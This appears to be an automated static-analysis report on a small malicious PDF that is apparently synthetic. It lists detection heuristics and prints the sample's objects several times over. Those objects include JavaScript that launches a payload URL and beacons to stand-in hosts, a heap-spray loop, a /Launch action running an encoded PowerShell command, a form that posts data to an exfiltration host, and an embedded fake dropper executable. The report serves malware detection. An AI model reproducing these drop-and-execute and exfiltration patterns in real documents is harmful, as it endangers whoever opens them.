Malicious PDF — malware analysis report

Static analysis result for SHA-256 01e8aa625aedec73…

MALICIOUS

PDF

2.5 KB First seen: 2026-06-06
MD5: 594cfc411bef58ba9eac1ca45a3f6dd2 SHA-1: 0039017fe194766609f9d20d9ce18e5455391241 SHA-256: 01e8aa625aedec7370162f0515c056464581f4ac561c582c8f53092cdb5565b5
546 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 15

  • Launch action critical PDF_LAUNCH
    PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
  • /Launch action target: cmd.exe critical PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target with parameters '/c powershell -enc SQBFAFgA...' — references a known-dangerous executable (cmd, PowerShell, etc.).
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var s = this.getURL('https://evil-dropper.example.cn/beacon');
    eval(unescape('%76%61%72%20%78%3d%31'));
    endstream
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript issues an HTTP request on open low PDF_JS_NETWORK_BEACON
    Embedded JavaScript calls a network API — this.getURL() to an http(s) URL, XMLHttpRequest, or SOAP — typically an open-time beacon / tracking pixel or data-exfil callback. This abuses a legitimate Acrobat API and exploits no vulnerability; the risk is the unsolicited outbound request (confirming recipient open or fetching a next stage).
    Matched line in script
    app.launchURL(url, true);
    var s = this.getURL('https://evil-dropper.example.cn/beacon');
    eval(unescape('%76%61%72%20%78%3d%31'));
  • Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
  • /Launch action paired with attachment-dropping JS API high PDF_LAUNCH_PLUS_DROPPER_JS
    PDF combines a /Launch action with a JavaScript API call that writes or opens an attached/external resource — the canonical shape of the CVE-2010-1240 /Launch + exportDataObject family. Benign PDFs do not pair these surfaces; the combination indicates a drop-and-execute chain regardless of the specific JS API knobs or /Launch target.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • SubmitForm action medium PDF_SUBMITFORM
    PDF has a /SubmitForm action — form data can be silently posted to an attacker-controlled URL
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • External URI info PDF_URI
    PDF contains an external URL action
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://evil-dropper.example.cn/beacon Referenced by PDF JavaScript
    • http://exfil-server.example.io/collectReferenced by PDF JavaScript
    • https://fake-update.example.top/update.binReferenced by PDF JavaScript
    • http://malware-cdn.example.ru/stage2/payload.exeReferenced by PDF JavaScript
    • http://185.220.101.45:4444/gate.phpReferenced by PDF JavaScript
    • http://awr-d.xml.usae/ala.xReferenced by PDF JavaScript
    • http://exfil-server.eReferenced by PDF JavaScript
    • http://phishing-login.example.org/verifyReferenced by PDF JavaScript
    • http://malicious-site.example.net/click?id=4571Referenced by PDF JavaScript

Extracted artifacts 7

Files carved from inside the sample during analysis.

FilenameKindSourceSize
invoice_scan.exe pdf-embedded-file PDF EmbeddedFile object 14 at offset 0x7DB 33 bytes
SHA-256: db48261aa9d79df258f7bcf0422d851f6f16268be63d1dd652b5456485945cb4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
actual_type=PE; declared_or_context_type=PDF; filename=invoice_scan.exe; kind=pdf-embedded-file
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x21D 285 bytes
SHA-256: 8b10a89507b45af8c9149c03c9c69ce11f6fa4ca5f4ea229bcfd2821e1e271dc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('%76%61%72%20%78%3d%31'));
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x6C0 141 bytes
SHA-256: ae3db073be58322bb7f6cbeeebdb7219b19a50f0e820958a6d223defea8941ca
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
javascript_obj0007_002.js pdf-javascript-stream PDF /JS object 7 at offset 0x23E 1953 bytes
SHA-256: 82a2141ba0a11a1b5acb87996b6d1a3a43b2586abd4c34df29aafedd610558a0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 shell/COM execution token(s). Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('%76%61%72%20%78%3d%31'));
endstream
endobj
8 0 obj
<< /Length 240 >>
stream
BT /F1 10 Tf 50 750 Td (Invoice from billing@evil-corp.example.net) Tj
(Visit http://phishing-login.example.org/verify) Tj
(C2: 103.224.182.250 and backup 91.240.118.172) Tj
(Contact: support@malicious-domain.example.com) Tj ET
endstream
endobj
9 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 612 792] /A << /S /URI /URI (http://malicious-site.example.net/click?id=4571) >> >>
endobj
10 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 100 100] /A << /S /Launch /Win << /F (cmd.exe) /P (/c powershell -enc SQBFAFgA...) >> >> >>
endobj
11 0 obj
<< /Type /Annot /Subtype /Widget /Rect [0 0 50 50] /A << /S /SubmitForm /F (http://exfil-server.example.io/collect) /Flags 4 >> >>
endobj
12 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 50 50] /A << /S /URI /URI (https://fake-update.example.top/update.bin) >> >>
endobj
13 0 obj
<< /Length 200 >>
stream
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
endstream
endobj
14 0 obj
<< /Type /EmbeddedFile /Subtype /application#2Foctet-stream /Length 40 >>
stream
MZ�      FAKE_PE_PAYLOAD_DROPPER 
endstream
endobj
15 0 obj
<< /Type /Filespec /F (invoice_scan.exe) /EF << /F 14 0 R >> >>
endobj
xref
0 16
0000000000 65535 f 
0000000015 00000 n 
0000000217 00000 n 
0000000276 00000 n 
0000000402 00000 n 
0000000448 00000 n 
0000000495 00000 n 
0000000541 00000 n 
0000000877 00000 n 
0000001155 00000 n 
0000001296 00000 n 
0000001446 00000 n 
0000001593 00000 n 
0000001728 00000 n 
0000001921 00000 n 
0000002062 00000 n 
trailer
<< /Size 16 /Root 1 0 R >>
startxref
2142
%%EOF
javascript_obj0013_003.js pdf-javascript-stream PDF /JS object 13 at offset 0x6E2 765 bytes
SHA-256: 7415c8b268f11d45cb402d944cc18e06814a498c0acfddfc8a74c88ccf04774f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
endstream
endobj
14 0 obj
<< /Type /EmbeddedFile /Subtype /application#2Foctet-stream /Length 40 >>
stream
MZ�      FAKE_PE_PAYLOAD_DROPPER 
endstream
endobj
15 0 obj
<< /Type /Filespec /F (invoice_scan.exe) /EF << /F 14 0 R >> >>
endobj
xref
0 16
0000000000 65535 f 
0000000015 00000 n 
0000000217 00000 n 
0000000276 00000 n 
0000000402 00000 n 
0000000448 00000 n 
0000000495 00000 n 
0000000541 00000 n 
0000000877 00000 n 
0000001155 00000 n 
0000001296 00000 n 
0000001446 00000 n 
0000001593 00000 n 
0000001728 00000 n 
0000001921 00000 n 
0000002062 00000 n 
trailer
<< /Size 16 /Root 1 0 R >>
startxref
2142
%%EOF
embedded_pdf_script_00000579.bin pdf-embedded-script PDF decompressed stream script payload at offset 0x579 2525 bytes
SHA-256: 245dbb288d497ba7561712e11bdada70ed38360d6c6434522c48483f1affcad7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 shell/COM execution token(s). Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
%PDF-1.7
%����
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R /AA << /WillClose 5 0 R /WC 5 0 R >> /Names << /JavaScript << /Names [ (init) 6 0 R ] >> >> /OpenAction << /S /JavaScript /JS 7 0 R >> >>
endobj
2 0 obj
<< /Type /Pages /Kids [ 3 0 R ] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 8 0 R /Annots [ 9 0 R 10 0 R 11 0 R 12 0 R ] >>
endobj
4 0 obj
<< /S /JavaScript /JS 7 0 R >>
endobj
5 0 obj
<< /S /JavaScript /JS 13 0 R >>
endobj
6 0 obj
<< /S /JavaScript /JS 7 0 R >>
endobj
7 0 obj
<< /Length 320 >>
stream
var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('%76%61%72%20%78%3d%31'));
endstream
endobj
8 0 obj
<< /Length 240 >>
stream
BT /F1 10 Tf 50 750 Td (Invoice from billing@evil-corp.example.net) Tj
(Visit http://phishing-login.example.org/verify) Tj
(C2: 103.224.182.250 and backup 91.240.118.172) Tj
(Contact: support@malicious-domain.example.com) Tj ET
endstream
endobj
9 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 612 792] /A << /S /URI /URI (http://malicious-site.example.net/click?id=4571) >> >>
endobj
10 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 100 100] /A << /S /Launch /Win << /F (cmd.exe) /P (/c powershell -enc SQBFAFgA...) >> >> >>
endobj
11 0 obj
<< /Type /Annot /Subtype /Widget /Rect [0 0 50 50] /A << /S /SubmitForm /F (http://exfil-server.example.io/collect) /Flags 4 >> >>
endobj
12 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 50 50] /A << /S /URI /URI (https://fake-update.example.top/update.bin) >> >>
endobj
13 0 obj
<< /Length 200 >>
stream
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
endstream
endobj
14 0 obj
<< /Type /EmbeddedFile /Subtype /application/octet-stream /Length 40 >>
stream
MZ�      FAKE_PE_PAYLOAD_DROPPER 
endstream
endobj
15 0 obj
<< /Type /Filespec /F (invoice_scan.exe) /EF << /F 14 0 R >> >>
endobj
xref
0 16
0000000000 65535 f 
0000000015 00000 n 
0000000217 00000 n 
0000000276 00000 n 
0000000402 00000 n 
0000000448 00000 n 
0000000495 00000 n 
0000000541 00000 n 
0000000877 00000 n 
0000001155 00000 n 
0000001296 00000 n 
0000001446 00000 n 
0000001593 00000 n 
0000001728 00000 n 
0000001921 00000 n 
0000002062 00000 n 
trailer
<< /Size 16 /Root 1 0 R >>
startxref
2142
%%EOF
generic_stage_recovery_000.js deobfuscated-js generic stage recovery percent-decode from combined JavaScript objects at offset 0x21D 3119 bytes
SHA-256: 60b94312accdb85fc15e209533233f1328568cfaa8fbb909e25b65ee26c6c504
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 shell/COM execution token(s). Carved artifact contains 9 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('var x=1'));
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
var a = unescape('%u9090%u9090%u4141%u4141');
var url = 'http://malware-cdn.example.ru/stage2/payload.exe';
var c2 = 'http://185.220.101.45:4444/gate.php';
app.launchURL(url, true);
var s = this.getURL('https://evil-dropper.example.cn/beacon');
eval(unescape('var x=1'));
endstream
endobj
8 0 obj
<< /Length 240 >>
stream
BT /F1 10 Tf 50 750 Td (Invoice from billing@evil-corp.example.net) Tj
(Visit http://phishing-login.example.org/verify) Tj
(C2: 103.224.182.250 and backup 91.240.118.172) Tj
(Contact: support@malicious-domain.example.com) Tj ET
endstream
endobj
9 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 612 792] /A << /S /URI /URI (http://malicious-site.example.net/click?id=4571) >> >>
endobj
10 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 100 100] /A << /S /Launch /Win << /F (cmd.exe) /P (/c powershell -enc SQBFAFgA...) >> >> >>
endobj
11 0 obj
<< /Type /Annot /Subtype /Widget /Rect [0 0 50 50] /A << /S /SubmitForm /F (http://exfil-server.example.io/collect) /Flags 4 >> >>
endobj
12 0 obj
<< /Type /Annot /Subtype /Link /Rect [0 0 50 50] /A << /S /URI /URI (https://fake-update.example.top/update.bin) >> >>
endobj
13 0 obj
<< /Length 200 >>
stream
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
endstream
endobj
14 0 obj
<< /Type /EmbeddedFile /Subtype /application#2Foctet-stream /Length 40 >>
stream
MZ�      FAKE_PE_PAYLOAD_DROPPER 
endstream
endobj
15 0 obj
<< /Type /Filespec /F (invoice_scan.exe) /EF << /F 14 0 R >> >>
endobj
xref
0 16
0000000000 65535 f 
0000000015 00000 n 
0000000217 00000 n 
0000000276 00000 n 
0000000402 00000 n 
0000000448 00000 n 
0000000495 00000 n 
0000000541 00000 n 
0000000877 00000 n 
0000001155 00000 n 
0000001296 00000 n 
0000001446 00000 n 
0000001593 00000 n 
0000001728 00000 n 
0000001921 00000 n 
0000002062 00000 n 
trailer
<< /Size 16 /Root 1 0 R >>
startxref
2142
%%EOF
var spray = '';
for (var i=0;i<2000;i++){ spray += unescape('%u0c0c%u0c0c'); }
util.printd('exploit', new Date());
var x = app.viewerVersion;
endstream
endobj
14 0 obj
<< /Type /EmbeddedFile /Subtype /application#2Foctet-stream /Length 40 >>
stream
MZ�      FAKE_PE_PAYLOAD_DROPPER 
endstream
endobj
15 0 obj
<< /Type /Filespec /F (invoice_scan.exe) /EF << /F 14 0 R >> >>
endobj
xref
0 16
0000000000 65535 f 
0000000015 00000 n 
0000000217 00000 n 
0000000276 00000 n 
0000000402 00000 n 
0000000448 00000 n 
0000000495 00000 n 
0000000541 00000 n 
0000000877 00000 n 
0000001155 00000 n 
0000001296 00000 n 
0000001446 00000 n 
0000001593 00000 n 
0000001728 00000 n 
0000001921 00000 n 
0000002062 00000 n 
trailer
<< /Size 16 /Root 1 0 R >>
startxref
2142
%%EOF